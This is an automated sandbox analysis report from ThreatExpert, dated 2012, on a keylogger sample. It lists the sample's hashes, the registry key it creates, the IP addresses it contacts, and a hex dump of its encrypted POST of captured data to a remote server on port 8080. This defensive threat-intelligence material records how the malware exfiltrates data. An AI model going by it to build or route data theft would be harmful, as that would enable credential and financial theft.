ThreatExpert Report

Submission Summary:

Submission details:

Submission received: 26 October 2012, 10:14:06
Processing time: 9 min 8 sec
Submitted sample:

File MD5: 0x2286E2BEE28F75C01BAAD12F853E4985
File SHA-1: 0x6DB0B95909F904A1FFA57CB905908E6194DC99D3
Filesize: 80,896 bytes

Summary of the findings:

What's been found	Severity Level
Capability to steal information such personal financial data (credit card numbers, online banking login details), user profiles, software registration keys, passwords.
Produces outbound traffic.
Contains characteristics of an identified security risk.

Technical Details:

Possible Security Risk

Attention! The following threat category was identified:

Threat Category	Description
	A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.)

File System Modifications

The following file was created in the system:

#	Filename(s)	File Size	File Hash
1	[file and pathname of the sample #1]	80,896 bytes	MD5: 0x2286E2BEE28F75C01BAAD12F853E4985 SHA-1: 0x6DB0B95909F904A1FFA57CB905908E6194DC99D3

Memory Modifications

There was a new process created in the system:

Process Name	Process Filename	Main Module Size
[filename of the sample #1]	[file and pathname of the sample #1]	851,968 bytes

Registry Modifications

The following Registry Key was created:

HKEY_CURRENT_USER\Software\WinRAR

The newly created Registry Value is:

[HKEY_CURRENT_USER\Software\WinRAR]

HWID = 7B 33 41 42 46 37 34 36 33 2D 39 45 34 36 2D 34 36 45 42 2D 41 33 42 33 2D 34 30 42 37 42 46 45 36 41 33 39 43 7D

Other details

The following Host Names were requested from a host database:

210.56.23.100
61.7.235.35
59.90.221.6

There was registered attempt to establish connection with the remote host. The connection details are:

Remote Host	Port Number
210.56.23.100	8080

Outbound traffic (potentially malicious)

There was an outbound traffic produced on port 8080:

00000000 | 504F 5354 202F 6173 702F 696E 7472 6F2E | POST /asp/intro.
00000010 | 7068 7020 4854 5450 2F31 2E30 0D0A 486F | php HTTP/1.0..Ho
00000020 | 7374 3A20 3231 302E 3536 2E32 332E 3130 | st: 210.56.23.10
00000030 | 300D 0A41 6363 6570 743A 202A 2F2A 0D0A | 0..Accept: */*..
00000040 | 4163 6365 7074 2D45 6E63 6F64 696E 673A | Accept-Encoding:
00000050 | 2069 6465 6E74 6974 792C 202A 3B71 3D30 |  identity, *;q=0
00000060 | 0D0A 436F 6E74 656E 742D 4C65 6E67 7468 | ..Content-Length
00000070 | 3A20 3435 360D 0A43 6F6E 6E65 6374 696F | : 456..Connectio
00000080 | 6E3A 2063 6C6F 7365 0D0A 436F 6E74 656E | n: close..Conten
00000090 | 742D 5479 7065 3A20 6170 706C 6963 6174 | t-Type: applicat
000000A0 | 696F 6E2F 6F63 7465 742D 7374 7265 616D | ion/octet-stream
000000B0 | 0D0A 436F 6E74 656E 742D 456E 636F 6469 | ..Content-Encodi
000000C0 | 6E67 3A20 6269 6E61 7279 0D0A 5573 6572 | ng: binary..User
000000D0 | 2D41 6765 6E74 3A20 4D6F 7A69 6C6C 612F | -Agent: Mozilla/
000000E0 | 342E 3020 2863 6F6D 7061 7469 626C 653B | 4.0 (compatible;
000000F0 | 204D 5349 4520 352E 303B 2057 696E 646F |  MSIE 5.0; Windo
00000100 | 7773 2039 3829 0D0A 0D0A 4352 5950 5445 | ws 98)....CRYPTE
00000110 | 4430 B6A0 1444 4BB3 56AE 4F62 6109 A062 | D0...DK.V.Oba..b
00000120 | C2C9 C5E7 C850 4925 BF5E 44CB 7C32 0C73 | .....PI%.^D.|2.s
00000130 | 3BBF 708A E154 3D8B B959 2218 982E DDE9 | ;.p..T=..Y".....
00000140 | ECE6 BBED EC4D 5FBF C3AE 56DD CF65 00FE | .....M_...V..e..
00000150 | C219 107C C3B2 86FB 646C 2329 9862 B9B9 | ...|....dl#).b..
00000160 | CAFE 02C9 8F75 FCD1 034F D56B A712 834C | .....u...O.k...L
00000170 | AD84 08DF 0581 5AA6 BCBD 228F 3928 2089 | ......Z...".9( .
00000180 | 9A08 4FED 31D2 2F77 A86D A20F 418A 5B85 | ..O.1./w.m..A.[.
00000190 | E721 AC38 AC42 1207 DC1E 5248 0703 3363 | .!.8.B....RH..3c
000001A0 | D708 C178 B86F A71C 100C 46E0 2567 9125 | ...x.o....F.%g.%
000001B0 | 2A4E F82C 4A77 D1A8 34A6 0F1A 8A1B 1BE5 | *N.,Jw..4.......
000001C0 | 911D E238 A7BA EB6D DB13 8ECD 5FD6 6D81 | ...8...m...._.m.
000001D0 | A592 707C BFE9 CC51 B875 223F C549 9E3C | ..p|...Q.u"?.I.<
000001E0 | 2C81 5641 E113 87E6 DDD6 64DE 2655 C035 | ,.VA......d.&U.5
000001F0 | 9ABF 4F6B A3B8 8880 7BA0 8FC0 0741 0F23 | ..Ok....{....A.#
00000200 | 8A58 22BD F701 6F6C 75F7 7A36 EC75 419F | .X"...olu.z6.uA.
00000210 | 40DF EECE 5AEA CF67 C9C5 145B E6DE 8D63 | @...Z..g...[...c
00000220 | 1F15 12D3 8652 4360 999E FD07 873E 20D6 | .....RC`.....> .
00000230 | 2B9C FDB1 FE0F 3550 2694 E439 2551 361B | +.....5P&..9%Q6.
00000240 | 0155 6F61 C437 0204 CDAB 9C81 CD55 86AD | .Uoa.7.......U..
00000250 | 337D 6C7A 1DDC DBE4 3985 6AA4 D0ED 733D | 3}lz....9.j...s=
00000260 | B18F DCAF ABE9 9C3C 6827 88DC 7E09 9DDE | .......<h'..~...
00000270 | 8340 7209 748A B479 6B01 7E78 44EA 5532 | .@r.t..yk.~xD.U2
00000280 | 0968 D947 6923 4F15 E5C3 44B4 79AA AD88 | .h.Gi#O...D.y...
00000290 | A16B 3DE9 0FC6 4D9A 3652 756A 9E18 BB74 | .k=...M.6Ruj...t
000002A0 | FC8A EBB8 B2A8 4A25 3C03 2B2B C25F 83EF | ......J%<.++._..
000002B0 | 550A F1B6 9DCA E233 2E9E 7B02 44F3 656B | U......3..{.D.ek
000002C0 | 22A7 6229 DD54 27DA 123C 7FCE 292D 5EDE | ".b).T'..<..)-^.
000002D0 | 832D                                    | .-

All content ("Information") contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies ("ThreatExpert") and may not be copied without the express permission of ThreatExpert.

The Information is provided on an "as is" basis. ThreatExpert disclaims all warranties, whether express or implied, to the maximum extent permitted by law, including the implied warranties that the Information is merchantable, of satisfactory quality, accurate, fit for a particular purpose or need, or non-infringing, unless such implied warranties are legally incapable of exclusion. Further, ThreatExpert does not warrant or make any representations regarding the use or the results of the use of the Information in terms of their correctness, accuracy, reliability, or otherwise.